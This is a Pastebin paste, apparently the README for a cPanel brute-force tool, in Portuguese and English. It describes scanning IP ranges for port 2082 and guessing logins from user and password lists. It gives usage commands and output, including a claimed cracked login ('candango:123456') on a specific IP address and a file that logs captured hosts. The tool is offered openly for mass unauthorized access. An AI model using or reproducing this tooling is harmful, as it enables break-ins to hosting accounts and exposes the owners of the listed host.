Muhammad_Bilal

Cpanel Brute force/range Script

Mar 2nd, 2014
663
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.96 KB | None | 0 0
  1.  
  2. _..@._
  3. .' `\
  4. / - - |
  5. / a a /,
  6. , | ^ D) )
  7. ||\ , \ .__, /'. '.
  8. |\`,'/ .-';`-.___..;.-'\ \
  9. \ _| / | .` _.; Happy new yeaR!
  10. | -.`| \ _.-'| | Let's celebrate :D
  11. \ ' \ 2 | . .' | |
  12. '._/`; 0 \ / /___\. Cpanel brute force by n4sss
  13. / \ 1 \ | .`;,' _\_ ready to Single/Range mode
  14. | \ 3 '.| _/___|_/_|_}_
  15. /\__ ' `'. '; \___________/
  16. | ',`'-.,_'. \ | |
  17. \/`'. ._,;`'. \ | HAPPY | 30/12/2012
  18. \ `\.' `| \ || NEW | <3 The king of fighters 2002
  19. | .' /-`\/| YEAR! |
  20. ;.' . _.'` / || | Greetx to BR-underground
  21. .' ,-' / / ;`-------`; And my cherry
  22. / .'`; \ ( '._ _.' d4y.m3nz3z <3
  23. \ ( \ ` )`'`(
  24. \_,()))) jgs .' '.
  25. `"""""""""`
  26.  
  27. Portuguese:
  28. -Cpanel brute force via range/single mode.
  29. -Arquivos Padrões:
  30. - cpanel_brute.php => Script para o brute force (cpanel)!
  31. - cpanel_brute.sh => Script para automatizar o scan range
  32. - ps => Port scan para indentificar hosts vivos na porta :2082 por exemplo
  33. - u.txt => Lista de usuarios
  34. - p.txt => Lista de senhas
  35. - cpanel_error_log.txt => Log de erros durante execução do script ex: avisos/alertas ref. curl
  36.  
  37. - Durante execução alguns usuarios podem receber a seguinte mensagem:
  38. => PHP Fatal error: Call to undefined function curl_init()
  39.  
  40. Para fix do mesmo instalar:
  41. php5-curl devidamente
  42. ex:
  43.  
  44. aptitude install php5-curl
  45. ou utility de preferencia.
  46.  
  47. Uso do script:
  48.  
  49. Single mode:
  50. --------------------------------------------------------------------------------------------------------
  51. root@m4g1cl4b:~/n4s/cpanel_brute# php cpanel_brute.php 187.108.192.25
  52. Cpanel brute force by n4sss!
  53. [+] Wait!
  54. [+] Cracking Success: 187.108.192.25 => candango:123456
  55.  
  56. Apos o brute ter sucesso nos testes um arquivo chamado cpanel_open.txt sera criado para registrar
  57. os hosts capturados:
  58.  
  59. root@m4g1cl4b:~/n4s/cpanel_brute# cat cpanel_open.txt
  60. [+]187.108.192.25 => candango:123456
  61. --------------------------------------------------------------------------------------------------------
  62.  
  63. Range scan mode:
  64. --------------------------------------------------------------------------------------------------------
  65.  
  66. root@m4g1cl4b:~/n4s/cpanel_brute# ./start 110.120
  67. Cpanel brute force by n4ssS!
  68. Just brute! (:
  69.  
  70. [+] Scanam: 110.120.17.* (total: 450) (80.7% done)
  71.  
  72. Apos a busca de hosts vivos na porta 2082, o script inicial chama o php
  73. php cpanel_brute.php $i > /dev/null &
  74. com um simples contador para a variavel não exceder o numero maior que 150 hosts por vez.
  75.  
  76. durante o brute basta verificar o processo em segundo plano
  77. root@m4g1cl4b:~/n4s/cpanel_brute# ps aux | grep php
  78.  
  79. root 1847 2.0 1.7 124812 8948 pts/2 S+ 14:01 0:00 php cpanel_brute.php 187.108.192.25
  80.  
  81. --------------------------------------------------------------------------------------------------------
  82.  
  83. ####################
  84.  
  85. English
  86.  
  87. Cpanel-range via brute force / single mode.
  88. Standards-Files:
  89. - Cpanel_brute.php => Script to brute force (cpanel)!
  90. - Cpanel_brute.sh => Script to automate the scan range
  91. - Ps => Port scan for indetify hosts living on port: 2082 for example
  92. - U.txt => List of users
  93. - P.txt => List of passwords
  94. - Cpanel_error_log.txt => Log errors during script execution ex: warnings / alerts ref. curl
  95.  
  96. - During implementation some users may receive the following message:
  97. => PHP Fatal error: Call to undefined function curl_init ()
  98.  
  99. To fix the same install:
  100. php5-curl properly
  101. eg
  102.  
  103. aptitude install php5-curl
  104. or preferably utility.
  105.  
  106. Using the script:
  107.  
  108. Single mode:
  109.  
  110. root@m4g1cl4b:~/n4s/cpanel_brute# php cpanel_brute.php 187.108.192.25
  111. Cpanel brute force by n4sss!
  112. [+] Wait!
  113. [+] Cracking Success: 187.108.192.25 => candango:123456
  114.  
  115. After the brute succeed in testing a file called cpanel_open.txt will be created to record
  116. hosts captured:
  117.  
  118. root@m4g1cl4b:~/n4s/cpanel_brute# cat cpanel_open.txt
  119. [+]187.108.192.25 => candango:123456
  120.  
  121.  
  122. Range scan mode:
  123.  
  124.  
  125. root@m4g1cl4b:~/n4s/cpanel_brute# ./start 110.120
  126. Cpanel brute force by n4ssS!
  127. Just brute! (:
  128.  
  129. [+] Scanam: 110.120.17.* (total: 450) (80.7% done)
  130.  
  131. After searching for hosts living on port 2082, the initial script calls the php
  132. php cpanel_brute.php $ i> / dev / null &
  133. with a simple counter for the variable does not exceed the number more than 150 hosts at a time.
  134.  
  135. during the brute just check the background process
  136. root@m4g1cl4b:~/n4s/cpanel_brute# ps aux | grep php
  137.  
  138. root 1847 2.0 1.7 124812 8948 pts/2 S+ 14:01 0:00 php cpanel_brute.php 187.108.192.25
Advertisement
Add Comment
Please, Sign In to add comment